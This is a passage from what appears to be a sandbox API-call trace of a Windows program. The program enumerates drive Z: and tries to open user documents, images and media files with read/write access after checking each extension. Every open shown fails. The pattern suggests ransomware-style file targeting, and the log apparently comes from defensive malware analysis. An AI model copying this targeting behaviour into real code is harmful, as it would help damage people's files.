Size=0x20) returned 0x2e83fe8 [0186.308] PathFindExtensionW (pszPath="Z:\\HwIsy.png") returned=".png" [0186.313] CreateFileW (lpFileName="Z:\\HwIsy.png" (normalized: "z:\\hwisy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.315] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14b01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LYsglM.bmp", cAlternateFileName="")) returned 1 [0186.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.315] PathFindExtensionW (pszPath="Z:\\LYsglM.bmp") returned=".bmp" [0186.320] CreateFileW (lpFileName="Z:\\LYsglM.bmp" (normalized: "z:\\lysglm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.322] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbb11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mro5NomIUcrU.gif", cAlternateFileName="")) returned 1 [0186.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.322] PathFindExtensionW (pszPath="Z:\\Mro5NomIUcrU.gif") returned=".gif" [0186.326] CreateFileW (lpFileName="Z:\\Mro5NomIUcrU.gif" (normalized: "z:\\mro5nomiucru.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.328] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17ae3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6IeyZTL6ti1EIr3r.csv", cAlternateFileName="")) returned 1 [0186.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.328] PathFindExtensionW (pszPath="Z:\\6IeyZTL6ti1EIr3r.csv") returned=".csv" [0186.333] CreateFileW (lpFileName="Z:\\6IeyZTL6ti1EIr3r.csv" (normalized: "z:\\6ieyztl6ti1eir3r.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.334] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe624, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XP77ZtgAwnoAMmLb.odt", cAlternateFileName="")) returned 1 [0186.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.334] PathFindExtensionW (pszPath="Z:\\XP77ZtgAwnoAMmLb.odt") returned=".odt" [0186.338] CreateFileW (lpFileName="Z:\\XP77ZtgAwnoAMmLb.odt" (normalized: "z:\\xp77ztgawnoammlb.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.339] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5eu5ng8aXBTiqaLM.odt", cAlternateFileName="")) returned 1 [0186.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.339] PathFindExtensionW (pszPath="Z:\\Z5eu5ng8aXBTiqaLM.odt") returned=".odt" [0186.343] CreateFileW (lpFileName="Z:\\Z5eu5ng8aXBTiqaLM.odt" (normalized: "z:\\z5eu5ng8axbtiqalm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.344] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1463b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYAzuw.flv", cAlternateFileName="")) returned 1 [0186.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.344] PathFindExtensionW (pszPath="Z:\\cYAzuw.flv") returned=".flv" [0186.348] CreateFileW (lpFileName="Z:\\cYAzuw.flv" (normalized: "z:\\cyazuw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.350] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17088, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ouLbzd5zuNL.xlsx", cAlternateFileName="")) returned 1 [0186.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.350] PathFindExtensionW (pszPath="Z:\\ouLbzd5zuNL.xlsx") returned=".xlsx" [0186.355] CreateFileW (lpFileName="Z:\\ouLbzd5zuNL.xlsx" (normalized: "z:\\oulbzd5zunl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.357] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x95ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ziRSYvhMQo.gif", cAlternateFileName="")) returned 1 [0186.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.357] PathFindExtensionW (pszPath="Z:\\ziRSYvhMQo.gif") returned=".gif" [0186.361] CreateFileW (lpFileName="Z:\\ziRSYvhMQo.gif" (normalized: "z:\\zirsyvhmqo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.363] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1287d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ziDfPcXQbWyMR.mkv", cAlternateFileName="")) returned 1 [0186.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.363] PathFindExtensionW (pszPath="Z:\\ziDfPcXQbWyMR.mkv") returned=".mkv" [0186.367] CreateFileW (lpFileName="Z:\\ziDfPcXQbWyMR.mkv" (normalized: "z:\\zidfpcxqbwymr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.368] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16553, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XsxuUpRBb.png", cAlternateFileName="")) returned 1 [0186.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.368] PathFindExtensionW (pszPath="Z:\\XsxuUpRBb.png") returned=".png" [0186.373] CreateFileW (lpFileName="Z:\\XsxuUpRBb.png" (normalized: "z:\\xsxuuprbb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.375] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11336, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyT73XuoM.png", cAlternateFileName="")) returned 1 [0186.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.375] PathFindExtensionW (pszPath="Z:\\ZyT73XuoM.png") returned=".png" [0186.380] CreateFileW (lpFileName="Z:\\ZyT73XuoM.png" (normalized: "z:\\zyt73xuom.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.381] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x118b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F2MyXNYBvTRkVNI7iEZq.ods", cAlternateFileName="")) returned 1 [0186.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.382] PathFindExtensionW (pszPath="Z:\\F2MyXNYBvTRkVNI7iEZq.ods") returned=".ods" [0186.385] CreateFileW (lpFileName="Z:\\F2MyXNYBvTRkVNI7iEZq.ods" (normalized: "z:\\f2myxnybvtrkvni7iezq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.387] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbc27, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YfJ9v2Plxllw22M.pps", cAlternateFileName="")) returned 1 [0186.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.387] PathFindExtensionW (pszPath="Z:\\YfJ9v2Plxllw22M.pps") returned=".pps" [0186.391] CreateFileW (lpFileName="Z:\\YfJ9v2Plxllw22M.pps" (normalized: "z:\\yfj9v2plxllw22m.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.394] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4fa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="17V0s09qqy.m4a", cAlternateFileName="")) returned 1 [0186.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.394] PathFindExtensionW (pszPath="Z:\\17V0s09qqy.m4a") returned=".m4a" [0186.398] CreateFileW (lpFileName="Z:\\17V0s09qqy.m4a" (normalized: "z:\\17v0s09qqy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.400] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc5f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lhOcmpk4G7IYSvvb.gif", cAlternateFileName="")) returned 1 [0186.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.400] PathFindExtensionW (pszPath="Z:\\lhOcmpk4G7IYSvvb.gif") returned=".gif" [0186.404] CreateFileW (lpFileName="Z:\\lhOcmpk4G7IYSvvb.gif" (normalized: "z:\\lhocmpk4g7iysvvb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.406] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x546b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XAdhL2WimPIvd1az2SF4.avi", cAlternateFileName="")) returned 1 [0186.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.406] PathFindExtensionW (pszPath="Z:\\XAdhL2WimPIvd1az2SF4.avi") returned=".avi" [0186.410] CreateFileW (lpFileName="Z:\\XAdhL2WimPIvd1az2SF4.avi" (normalized: "z:\\xadhl2wimpivd1az2sf4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.411] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13931, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f8MOguJ.mkv", cAlternateFileName="")) returned 1 [0186.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.411] PathFindExtensionW (pszPath="Z:\\f8MOguJ.mkv") returned=".mkv" [0186.416] CreateFileW (lpFileName="Z:\\f8MOguJ.mkv" (normalized: "z:\\f8moguj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.417] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265bb779, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11953, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MvTzQbxzFuteK4.avi", cAlternateFileName="")) returned 1 [0186.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.417] PathFindExtensionW (pszPath="Z:\\MvTzQbxzFuteK4.avi") returned=".avi" [0186.421] CreateFileW (lpFileName="Z:\\MvTzQbxzFuteK4.avi" (normalized: "z:\\mvtzqbxzfutek4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.422] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd40b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="woWNv.ods", cAlternateFileName="")) returned 1 [0186.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.423] PathFindExtensionW (pszPath="Z:\\woWNv.ods") returned=".ods" [0186.427] CreateFileW (lpFileName="Z:\\woWNv.ods" (normalized: "z:\\wownv.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.428] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0sa57fW.pptx", cAlternateFileName="")) returned 1 [0186.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.428] PathFindExtensionW (pszPath="Z:\\0sa57fW.pptx") returned=".pptx" [0186.433] CreateFileW (lpFileName="Z:\\0sa57fW.pptx" (normalized: "z:\\0sa57fw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.434] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O2TDqFynLaMJwyS.avi", cAlternateFileName="")) returned 1 [0186.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.434] PathFindExtensionW (pszPath="Z:\\O2TDqFynLaMJwyS.avi") returned=".avi" [0186.439] CreateFileW (lpFileName="Z:\\O2TDqFynLaMJwyS.avi" (normalized: "z:\\o2tdqfynlamjwys.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.440] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4f21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m2U2YlUMt.gif", cAlternateFileName="")) returned 1 [0186.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.440] PathFindExtensionW (pszPath="Z:\\m2U2YlUMt.gif") returned=".gif" [0186.444] CreateFileW (lpFileName="Z:\\m2U2YlUMt.gif" (normalized: "z:\\m2u2ylumt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.446] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, 